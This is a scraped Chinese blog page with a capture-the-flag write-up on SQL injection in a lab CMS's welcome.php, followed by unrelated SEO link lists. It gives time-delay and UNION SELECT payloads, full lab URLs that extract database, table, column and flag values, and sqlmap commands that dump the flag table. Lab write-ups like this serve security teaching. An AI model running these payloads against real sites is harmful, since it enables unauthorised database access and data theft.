当前位置: 首页 > news >正文

企业解决方案网站快速排名优化价格

企业解决方案,网站快速排名优化价格,国外网站代做,湖南专业做网站公司有哪些靶标介绍: 该CMS的welcome.php中存在SQL注入攻击。 获取登录地址 http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com:80 登录注册 注册成功登录进入注册接口 参数接口一 发现接口参数q http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.p…

靶标介绍:

该CMS的welcome.php中存在SQL注入攻击。

获取登录地址

http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com:80

登录注册

注册成功登录进入注册接口

参数接口一
发现接口参数q http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=1

SQL盲注未发现利用点
http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=1' or '1'=1

继续下一步 查看接口和参数情况

参数接口二:

q step eid  n t等http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34

注入点判断方式

参数后加'

参数后加'%2b(select*from(select(sleep(20)))a)%2b'

参数后加' union select 1,2,3,4,5--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694%27%20union%20select%201,2,3,4,5--+&n=1&t=34

查询数据库名

n=2' union select 1,2,database(),4,5--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694n=2%27%20union%20select%201,2,database(),4,5--+&n=1&t=34

查看表信息

2' union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema='ctf'--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db3626942%27%20union%20select%201,2,group_concat(table_name),4,5%20from%20information_schema.tables%20where%20table_schema=%27ctf%27--+&n=1&t=34

查询表字段信息

' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema='ctf' and table_name='flag'--+

输入地址栏http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db3626942%27%20union%20select%201,2,group_concat(column_name),4,5%20from%20information_schema.columns%20where%20table_schema=%27ctf%27%20and%20table_name=%27flag%27--+

 查看flag表中的字段

2' union select 1,2,group_concat(flag),4,5 from flag--+

发现接口参数 http://eci-2zeb0096que0556y47vq.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694' union select 1,2,group_concat(flag),4,5

 flag{e5fb9a56-bfce-48cb-a816-77599da3b03a}

burusuite使用 

 burpsuite也是一款强大的漏扫工具,通过爬取接口进行扫描发现 接口是否存在安全隐患,具体使用教程就不说了,看个人习惯

 

sqlmap使用 

 暴库

保存txt文件执行

python sqlmap.py -l C:\Users\cheng\Desktop\1.txt --batch -dbs

爆破表 

python sqlmap.py -r D:/bc1.txt --batch -D "ctf" --tables

爆破表字段 

 python sqlmap.py -r D:/bc1.txt --batch -D "ctf" -T "flag" --columns

爆破具体字段信息

执行--batch -D "ctf" -T "flag" -C "flag" --dump

  flag{e5fb9a56-bfce-48cb-a816-77599da3b03a} 

SQL注入寻找接口,寻找参数, 寻找注入点, 进行sql盲注 ,查看响应结果值, 工具可以使用sqlmap bp进行测试验证 

http://www.mnyf.cn/news/38747.html

相关文章:

  • 自己做网站需要买什么推广软文发布平台
  • 什么网站可以免费做兼职线上营销方案
  • 聊城网站优化技术网站seo标题是什么意思
  • 电商网站前端源码企业推广的网站
  • 广西旅游 网站建设百度网站大全首页
  • 潍坊网站建设价百度识图找原图
  • 武汉网页制作上海seo推广公司
  • 企业网站建设目的雏鸟app网站推广
  • 使用万网怎么做网站广告软文小故事800字
  • javase可以做网站吗东莞网站设计
  • 网站开发增值税税率是多少钱沪深300指数
  • 免费微信网站怎么做百度的人工客服
  • 沈阳网站搜索引擎优化河南百度推广电话
  • 南宁网站建设 南宁联达亿淘宝店铺怎么推广
  • 中级经济师考试题库1000题企业seo案例
  • 网站新站整站排名今日广州新闻头条
  • 网站推广优化方案seo零基础培训
  • 汕头做网站百度怎么打广告
  • dell网站设计特色黄页88推广多少钱一年
  • 做展示型网站关键词优化排名软件流量词
  • 沈阳做网站哪家好北京口碑最好的教育机构
  • 网站怎么做缓存互联网项目推广
  • 编程序可以做网站吗有哪些平台可以免费发广告
  • 公司网站建设模板百度app下载并安装
  • 响应式网站咨询武汉关键词包年推广
  • 邯郸网站建设报价西点培训
  • 酷黑网站上海网络公司seo
  • 三沙网站设计公司福州百度开户多少钱
  • wap手机网站建设如何快速提升网站关键词排名
  • 杭州建设局网站官网seo的作用主要有